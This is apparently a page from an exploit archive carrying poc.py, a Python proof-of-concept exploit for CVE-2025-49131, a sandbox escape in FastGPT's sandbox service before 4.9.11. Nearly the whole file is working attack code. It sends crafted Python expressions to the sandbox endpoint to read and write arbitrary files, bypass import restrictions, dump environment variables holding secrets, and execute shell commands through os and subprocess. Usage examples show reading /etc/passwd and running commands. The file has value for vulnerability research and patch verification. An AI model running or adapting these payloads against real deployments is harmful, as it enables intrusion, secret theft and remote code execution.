4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / poc.py PY
#!/usr/bin/env python3
"""
CVE-2025-49131 - FastGPT Sandbox Escape Proof of Concept
========================================================
Vulnerability: Sandbox Escape via insufficient isolation
Affected: FastGPT fastgpt-sandbox < 4.9.11
CVSS: 6.3 (Medium)
Impact: Read/Write arbitrary files, bypass Python import restrictions

Author: Security Research
Date: 2025-12-30
"""

import argparse
import requests
import json
import base64
import sys
from typing import Optional, Dict, Any

# Colors for output
class Colors:
    """ANSI escape sequences used to colorize terminal output."""

    # Foreground colors.
    RED = "\033[91m"
    GREEN = "\033[92m"
    YELLOW = "\033[93m"
    BLUE = "\033[94m"
    PURPLE = "\033[95m"
    CYAN = "\033[96m"

    # Text attributes.
    RESET = "\033[0m"  # clears every attribute set by the codes above
    BOLD = "\033[1m"

def banner() -> None:
    """Print the colored ASCII-art title and the CVE summary box to stdout.

    The art is a single f-string; the ``Colors`` placeholders switch the
    terminal color between sections and ``Colors.RESET`` restores it after
    the summary box.
    """
    print(f"""{Colors.RED}
 ███████╗ █████╗ ███████╗████████╗ ██████╗ ██████╗ ████████╗
 ██╔════╝██╔══██╗██╔════╝╚══██╔══╝██╔════╝ ██╔══██╗╚══██╔══╝
 █████╗  ███████║███████╗   ██║   ██║  ███╗██████╔╝   ██║   
 ██╔══╝  ██╔══██║╚════██║   ██║   ██║   ██║██╔═══╝    ██║   
 ██║     ██║  ██║███████║   ██║   ╚██████╔╝██║        ██║   
 ╚═╝     ╚═╝  ╚═╝╚══════╝   ╚═╝    ╚═════╝ ╚═╝        ╚═╝   
{Colors.YELLOW}
 ███████╗ █████╗ ███╗   ██╗██████╗ ██████╗  ██████╗ ██╗  ██╗
 ██╔════╝██╔══██╗████╗  ██║██╔══██╗██╔══██╗██╔═══██╗╚██╗██╔╝
 ███████╗███████║██╔██╗ ██║██║  ██║██████╔╝██║   ██║ ╚███╔╝ 
 ╚════██║██╔══██║██║╚██╗██║██║  ██║██╔══██╗██║   ██║ ██╔██╗ 
 ███████║██║  ██║██║ ╚████║██████╔╝██████╔╝╚██████╔╝██╔╝ ██╗
 ╚══════╝╚═╝  ╚═╝╚═╝  ╚═══╝╚═════╝ ╚═════╝  ╚═════╝ ╚═╝  ╚═╝
{Colors.GREEN}
 ███████╗███████╗ ██████╗ █████╗ ██████╗ ███████╗           
 ██╔════╝██╔════╝██╔════╝██╔══██╗██╔══██╗██╔════╝           
 █████╗  ███████╗██║     ███████║██████╔╝█████╗             
 ██╔══╝  ╚════██║██║     ██╔══██║██╔═══╝ ██╔══╝             
 ███████╗███████║╚██████╗██║  ██║██║     ███████╗           
 ╚══════╝╚══════╝ ╚═════╝╚═╝  ╚═╝╚═╝     ╚══════╝           
                                                            
{Colors.CYAN}╔═══════════════════════════════════════════════════════════╗
║              CVE-2025-49131 | CVSS 6.3 (Medium)           ║
║            FastGPT Sandbox Container Escape                ║
║                 Affected: < v4.9.11                        ║
║   Impact: File R/W, Import Bypass, Remote Code Execution   ║
╚═══════════════════════════════════════════════════════════╝{Colors.RESET}
""")


class FastGPTSandboxExploit:
    """Client for the CVE-2025-49131 FastGPT sandbox proof of concept.

    Every public action builds one or more Python expressions, submits them
    to the target through :meth:`execute_code`, and reports whether the
    response looks like a successful evaluation.
    """

    def __init__(self, target: str, verbose: bool = False):
        """Store the target base URL and prepare a reusable HTTP session.

        Args:
            target: Base URL of the sandbox service; a trailing ``/`` is
                stripped so endpoint paths can be appended directly.
            verbose: When True, ``info`` and ``warning`` messages are printed
                in addition to ``success`` and ``error``.
        """
        self.target = target.rstrip('/')
        self.verbose = verbose
        self.session = requests.Session()
        self.session.headers.update({
            'Content-Type': 'application/json',
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
        })

    @staticmethod
    def _is_success(result: Any, markers: tuple = ("error",)) -> bool:
        """Return True when *result* is non-empty and free of failure markers.

        The sandbox response is decoded JSON, so *result* is not guaranteed to
        be a string. It is converted with ``str()`` before the
        case-insensitive marker search so that dict/list/number results are
        judged the same way as text instead of raising ``AttributeError``.

        Args:
            result: Value returned by :meth:`execute_code`.
            markers: Lower-case substrings that indicate a failed evaluation.
        """
        if not result:
            return False
        text = str(result).lower()
        return not any(marker in text for marker in markers)

    def log(self, msg: str, level: str = 'info'):
        """Print *msg* with a colored ``[LEVEL]`` prefix.

        ``success`` and ``error`` messages are always printed; other levels
        are printed only when ``self.verbose`` is set.
        """
        colors = {
            'info': Colors.BLUE,
            'success': Colors.GREEN,
            'error': Colors.RED,
            'warning': Colors.YELLOW
        }
        if self.verbose or level in ['success', 'error']:
            print(f"{colors.get(level, Colors.RESET)}[{level.upper()}]{Colors.RESET} {msg}")

    def check_target(self) -> bool:
        """Return True when ``GET {target}/health`` answers with HTTP 200.

        Any exception raised by the request is logged and reported as False.
        """
        try:
            resp = self.session.get(f"{self.target}/health", timeout=10)
            return resp.status_code == 200
        except Exception as e:
            self.log(f"Target unreachable: {e}", 'error')
            return False

    def detect_vulnerability(self) -> Dict[str, Any]:
        """Run the read-only detection expressions and summarize the outcome.

        Returns:
            A dict with ``vulnerable`` (True if any expression evaluated
            without an error marker), ``version`` (always ``"unknown"``) and
            ``details`` (one entry per expression that passed or raised).
        """
        self.log("Checking for CVE-2025-49131 vulnerability...", 'info')

        # Detection payload - tries to access __builtins__
        detection_payloads = [
            {
                "code": "str(type(__builtins__))",
                "description": "Builtins access check"
            },
            {
                "code": "str(dir())",
                "description": "Global namespace check"
            }
        ]

        results = {
            "vulnerable": False,
            "version": "unknown",
            "details": []
        }

        for payload in detection_payloads:
            try:
                result = self.execute_code(payload["code"])
            except Exception as e:
                results["details"].append({
                    "test": payload["description"],
                    "result": "blocked",
                    "error": str(e)
                })
                continue

            if self._is_success(result):
                results["details"].append({
                    "test": payload["description"],
                    "result": "passed",
                    # str() first: the result may be any JSON value, and only
                    # strings/lists support slicing.
                    "output": str(result)[:100]
                })
                results["vulnerable"] = True

        return results

    def execute_code(self, code: str) -> Optional[Any]:
        """Submit *code* to the sandbox endpoint and return its result.

        POSTs ``{"code": code, "variables": {}}`` to
        ``{target}/api/sandbox/run``.

        Returns:
            On HTTP 200, the ``result`` field of the JSON body, falling back
            to ``output`` and then to ``str()`` of the whole body. The value
            is whatever JSON type the server sent, not necessarily a string.
            On any other status code, or if the request or JSON decoding
            raises, the problem is logged and None is returned.
        """
        payload = {
            "code": code,
            "variables": {}
        }

        try:
            resp = self.session.post(
                f"{self.target}/api/sandbox/run",
                json=payload,
                timeout=30
            )

            if resp.status_code == 200:
                data = resp.json()
                return data.get("result", data.get("output", str(data)))
            else:
                self.log(f"Request failed: {resp.status_code}", 'error')
                return None
        except Exception as e:
            self.log(f"Execution error: {e}", 'error')
            return None

    def read_file(self, filepath: str) -> Optional[str]:
        """Try each file-read expression in turn and return the first result.

        A result counts as successful when it is non-empty and contains
        neither ``error`` nor ``traceback`` (case-insensitive).

        Returns:
            The result as a string, or None when every expression failed.
        """
        self.log(f"Attempting to read: {filepath}", 'info')

        # Multiple file read payloads
        payloads = [
            # Direct open
            f"open('{filepath}', 'r').read()",

            # Builtins bypass
            f"__builtins__.open('{filepath}').read()",

            # Lambda wrapper
            f"(lambda: open('{filepath}').read())()",

            # Getattr bypass
            f"getattr(__builtins__, 'open')('{filepath}').read()",

            # Code object manipulation
            f"exec('result=open(\"{filepath}\").read()') or result",
        ]

        for i, payload in enumerate(payloads, 1):
            self.log(f"Trying payload {i}/{len(payloads)}...", 'info')
            try:
                result = self.execute_code(payload)
            except Exception as e:
                self.log(f"Payload {i} failed: {e}", 'warning')
                continue
            if self._is_success(result, ("error", "traceback")):
                self.log(f"Success with payload {i}!", 'success')
                # Honor the declared str return type even for non-text JSON.
                return str(result)

        self.log("All file read payloads failed", 'error')
        return None

    def write_file(self, filepath: str, content: str) -> bool:
        """Try each file-write expression in turn.

        Backslashes and single quotes in *content* are escaped before it is
        embedded in the single-quoted literal of the expression.

        Returns:
            True as soon as one expression yields a non-empty result without
            an ``error`` marker (the same criterion the other actions use),
            False when every expression failed.
        """
        self.log(f"Attempting to write to: {filepath}", 'info')

        # Escape content for Python string
        escaped_content = content.replace('\\', '\\\\').replace("'", "\\'")

        payloads = [
            f"open('{filepath}', 'w').write('{escaped_content}')",
            f"__builtins__.open('{filepath}', 'w').write('{escaped_content}')",
        ]

        for i, payload in enumerate(payloads, 1):
            try:
                result = self.execute_code(payload)
            except Exception as e:
                self.log(f"Payload {i} failed: {e}", 'warning')
                continue
            # Previously any truthy response, including error text, was
            # reported as a successful write.
            if self._is_success(result):
                self.log("File write successful!", 'success')
                return True

        self.log("All file write payloads failed", 'error')
        return False

    def import_bypass(self, module: str) -> Optional[str]:
        """Try each import expression in turn for *module*.

        Returns:
            The first non-empty result without an ``error`` marker, as a
            string, or None when every expression failed.
        """
        self.log(f"Attempting to import: {module}", 'info')

        payloads = [
            # Direct import
            f"__import__('{module}')",

            # Builtins import
            f"__builtins__.__import__('{module}')",

            # Importlib
            f"__import__('importlib').import_module('{module}')",

            # Exec import
            f"exec('import {module}')",

            # Dict access
            f"__builtins__.__dict__['__import__']('{module}')",
        ]

        for i, payload in enumerate(payloads, 1):
            try:
                result = self.execute_code(payload)
            except Exception as e:
                # Surface the failure like the sibling methods do instead of
                # dropping it silently.
                self.log(f"Payload {i} failed: {e}", 'warning')
                continue
            if self._is_success(result):
                self.log(f"Import bypass successful with payload {i}!", 'success')
                return str(result)

        self.log("All import bypass payloads failed", 'error')
        return None

    def get_env(self) -> Optional[Dict]:
        """Return the first truthy result of the environment expressions.

        The value is passed through exactly as :meth:`execute_code` returned
        it; None is returned when no expression produced a result.
        """
        self.log("Attempting to read environment variables...", 'info')

        payloads = [
            "__import__('os').environ.copy()",
            "dict(__import__('os').environ)",
        ]

        for i, payload in enumerate(payloads, 1):
            try:
                result = self.execute_code(payload)
            except Exception as e:
                # A bare ``except:`` would also trap KeyboardInterrupt and
                # SystemExit; catch ordinary errors only and report them.
                self.log(f"Payload {i} failed: {e}", 'warning')
                continue
            if result:
                return result
        return None

    def rce_chain(self, command: str) -> Optional[str]:
        """Try each command-execution expression in turn for *command*.

        Returns:
            The first truthy result exactly as :meth:`execute_code` returned
            it, or None when every expression failed. No error-marker
            filtering is applied here.
        """
        self.log(f"Attempting RCE chain with command: {command}", 'info')

        payloads = [
            # os.system
            f"__import__('os').system('{command}')",

            # os.popen
            f"__import__('os').popen('{command}').read()",

            # subprocess
            f"__import__('subprocess').check_output('{command}', shell=True).decode()",

            # subprocess with Popen
            f"__import__('subprocess').Popen('{command}', shell=True, stdout=-1).communicate()[0].decode()",
        ]

        for i, payload in enumerate(payloads, 1):
            try:
                result = self.execute_code(payload)
            except Exception as e:
                self.log(f"RCE method {i} failed: {e}", 'warning')
                continue
            if result:
                self.log(f"RCE successful with method {i}!", 'success')
                return result

        self.log("All RCE payloads failed", 'error')
        return None


def main():
    """Parse the command line and run each requested action against the target.

    Actions run in a fixed order (detect, read, write, import, env, rce).
    The outcome of every requested action, successful or not, is appended to
    a results dict, which is written as JSON to ``--output`` when given.
    """
    banner()

    parser = argparse.ArgumentParser(
        description='CVE-2025-49131 - FastGPT Sandbox Escape POC',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  python poc.py --target http://localhost:3001 --detect
  python poc.py --target http://localhost:3001 --read /etc/passwd
  python poc.py --target http://localhost:3001 --write /tmp/pwned --content "CVE-2025-49131"
  python poc.py --target http://localhost:3001 --import os
  python poc.py --target http://localhost:3001 --rce "id"
        """
    )

    parser.add_argument('--target', '-t', required=True, help='Target FastGPT sandbox URL')
    parser.add_argument('--detect', '-d', action='store_true', help='Detect vulnerability (non-destructive)')
    parser.add_argument('--read', '-r', help='File path to read')
    parser.add_argument('--write', '-w', help='File path to write')
    parser.add_argument('--content', '-c', default='CVE-2025-49131 POC', help='Content to write')
    # ``import`` is a Python keyword, so the value is stored under another name.
    parser.add_argument('--import', '-i', dest='import_module', help='Module to import')
    parser.add_argument('--env', '-e', action='store_true', help='Read environment variables')
    parser.add_argument('--rce', help='Command to execute (RCE)')
    parser.add_argument('--verbose', '-v', action='store_true', help='Verbose output')
    parser.add_argument('--output', '-o', help='Output file for results')

    args = parser.parse_args()

    exploit = FastGPTSandboxExploit(args.target, args.verbose)

    results = {"target": args.target, "cve": "CVE-2025-49131", "actions": []}

    if args.detect:
        print(f"\n{Colors.CYAN}[*] Running vulnerability detection...{Colors.RESET}")
        detect_result = exploit.detect_vulnerability()
        results["detection"] = detect_result

        if detect_result["vulnerable"]:
            print(f"{Colors.GREEN}[+] TARGET IS VULNERABLE!{Colors.RESET}")
        else:
            print(f"{Colors.YELLOW}[-] Target may be patched or not vulnerable{Colors.RESET}")

        print(json.dumps(detect_result, indent=2))

    if args.read:
        print(f"\n{Colors.CYAN}[*] Reading file: {args.read}{Colors.RESET}")
        content = exploit.read_file(args.read)
        if content:
            print(f"{Colors.GREEN}[+] File content:{Colors.RESET}")
            print("-" * 50)
            print(content)
            print("-" * 50)
            # Only the first 500 characters are kept in the saved report.
            results["actions"].append({"type": "read", "file": args.read, "success": True, "content": content[:500]})
        else:
            results["actions"].append({"type": "read", "file": args.read, "success": False})

    if args.write:
        print(f"\n{Colors.CYAN}[*] Writing to file: {args.write}{Colors.RESET}")
        success = exploit.write_file(args.write, args.content)
        results["actions"].append({"type": "write", "file": args.write, "success": success})
        if success:
            print(f"{Colors.GREEN}[+] File written successfully!{Colors.RESET}")

    if args.import_module:
        print(f"\n{Colors.CYAN}[*] Attempting import bypass: {args.import_module}{Colors.RESET}")
        result = exploit.import_bypass(args.import_module)
        results["actions"].append({"type": "import", "module": args.import_module, "success": bool(result)})
        if result:
            print(f"{Colors.GREEN}[+] Import bypass successful: {result}{Colors.RESET}")

    if args.env:
        print(f"\n{Colors.CYAN}[*] Reading environment variables...{Colors.RESET}")
        env = exploit.get_env()
        if env:
            print(f"{Colors.GREEN}[+] Environment:{Colors.RESET}")
            print(env)
            results["actions"].append({"type": "env", "success": True})
        else:
            # Record the failure too, so the report lists every requested
            # action just as it does for read, write, import and rce.
            results["actions"].append({"type": "env", "success": False})

    if args.rce:
        print(f"\n{Colors.CYAN}[*] Attempting RCE: {args.rce}{Colors.RESET}")
        output = exploit.rce_chain(args.rce)
        if output:
            print(f"{Colors.GREEN}[+] Command output:{Colors.RESET}")
            print("-" * 50)
            print(output)
            print("-" * 50)
            results["actions"].append({"type": "rce", "command": args.rce, "success": True, "output": output})
        else:
            results["actions"].append({"type": "rce", "command": args.rce, "success": False})

    if args.output:
        # Explicit encoding keeps the report identical across platforms whose
        # locale default is not UTF-8.
        with open(args.output, 'w', encoding='utf-8') as f:
            json.dump(results, f, indent=2)
        print(f"\n{Colors.GREEN}[+] Results saved to: {args.output}{Colors.RESET}")

    print(f"\n{Colors.PURPLE}[*] Exploit completed.{Colors.RESET}")


# Run the command-line interface only when this file is executed as a script,
# so importing the module has no side effects.
if __name__ == "__main__":
    main()